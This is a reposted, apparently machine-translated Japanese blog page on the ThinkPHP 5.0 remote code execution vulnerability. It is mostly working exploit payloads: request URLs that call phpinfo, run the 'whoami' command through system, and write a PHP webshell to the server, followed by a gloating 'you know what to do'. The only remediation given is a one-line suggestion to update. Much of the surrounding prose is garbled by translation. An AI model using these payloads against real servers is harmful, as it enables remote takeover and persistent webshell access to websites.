thinkphp5.0リモート実行される脆弱性 - コードワールド

thinkphp5.0リモート実行される脆弱性

その他 2020-03-09 14:52:24 訪問数: null

0x01の脆弱性プロファイル

以来、十分な安全監視せずThinkPHP5フレームコントローラ名、ルートの強制開口を招くことなく、特定の要求を直接Getshell（制御サーバ）であってもよい偽装することができ

ビルドに0x02の環境

Phpstudy：PHP-5.5.38 + Apacheの

私はバージョンをダウンロードダウンロード不備バージョンである thinkphp_5.0.22 ビルドは、図2の良い未来。

ダウンロードリンク：http://www.thinkphp.cn/donate/download/id/1261.html

0x03の脆弱性ペイロード

phpinfoのページ：

http://127.0.0.1/thinkphp_5.0.22/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

実行にwhoami コマンドを：

http://127.0.0.1/thinkphp_5.0.22/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

ライトシェル：

http：// 127.0.0.1 /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^%3C?php%20@eval （$ _GET [％22snowwolf％22]）？^％の3Eの％3Eshell.php

そして、あなたはそれを行う方法を知っていますよ。

ハッハッハ

0X03のバグ修正

私たちは、あなたが最新バージョンにアップデートすることをお勧めします

おすすめ

転載: www.cnblogs.com/bflw/p/12448379.html

thinkphp5.0リモート実行される脆弱性

脆弱性の再現：MS14-064 OLEリモートでコードが実行される脆弱性

ApacheのSSIリモートコマンドが実行される脆弱性

ThinkPHP5.0脆弱性テスト

最近復元されたリモートPHPが実行される脆弱性が悪用されて

Joomlaの3.4.6、リモートでコードが実行される脆弱性分析再現性

[高リスク] Microsoft Exchange Server のリモートでコードが実行される脆弱性

[高リスク] Microsoft Teams のリモートでコードが実行される脆弱性

ウィーバーE-cology OAリモートでコードが実行される脆弱性

PHP-CGI、リモートコードが実行される脆弱性（CVE-2012から1823）

CVE-2019-5032 / 5033/5041：Aspose社、リモートでコードが実行される脆弱性を警告

VideoLANの：VLCリモートでコードが実行される脆弱性がすでに修理します！

CVE-2019から14422：TortoiseSVNは、リモートでコードが実行される脆弱性を警告

CMS 4.7.10リモートでコードが実行される脆弱性分析を摘み取ります

PHP PHP-FPM 7は、リモートでコードが実行される脆弱性が存在します

Tomcatのリモートでコードが実行される脆弱性CVE-2017から12615再現

PHP-FPMリモートでコードが実行される脆弱性（CVE-2019から11043）

【再生】脆弱性はApache Solrのリモートでコードが実行される（CVE-2019から0193）

ApacheのActiveMQのリモートでコードが実行される脆弱性（CVE-2016から3088）

CVE-2020-3943：VMwareのvRealize、リモートでコードが実行される脆弱性を警告

CVE-2020-2555：のOracle WebLogic Serverのリモートでコードが実行される脆弱性の警告

CVE-2020-1947：ApacheのShardingSphere、リモートでコードが実行される脆弱性を警告

ピカチュウ-RCE [リモートでコードが実行される脆弱性コマンド]

PHPのリモートでコードが実行される脆弱性の分析（CVE2019-11043）

struts2-045 リモートでコードが実行される脆弱性 (CVE-2017-5638)

[緊急] PowerJob<=4.3.3 リモートでコードが実行される脆弱性

新しい WinRAR の脆弱性によりリモートでコードが実行される

高リスクで[警告]脆弱性Redisの4.xの/ 5.xのリモートコマンドが実行される脆弱性

Microsoft Windowsのリモートデスクトップサービス、リモートでコードが実行される脆弱性（CVE-2019から0708）

ピカチュウ-RCE（リモートコマンドと、リモートコード - 実行される脆弱性）

おすすめ

NYSEの技術的問題によりバークシャー・ハサウェイ(BRK.A)はほぼ100％下落

ランキング

Jieluanzihuai V

Deep Learning Made Easy: プーリング操作は変換モデルで何を参照していますか?

どのような共通の属性のCSS3ボックスサイジング？役割は何ですか？

CSP2019-Sが移動します

Pythonの定量的株取引（11）--- pyqt5を使用して株取引ソフトウェアのホームページを構築する

Python ディープラーニングは、発生したエラー報告の問題を解決します 3

バースト解析を示す 2D マップ

コード書かpycharmを実行するためのPythonのコマンドライン

mybatisplus はクエリの重複を排除するためにどのように使用しますか

Sparkメモリ管理の詳細な説明

アーカイブ

もっと

2024-06-03(1)

2024-06-02(0)

2024-06-01(1)

2024-05-31(1)

2024-05-30(0)

2024-05-29(1)

2024-05-28(0)

2024-05-27(1)

2024-05-26(0)

2024-05-25(1)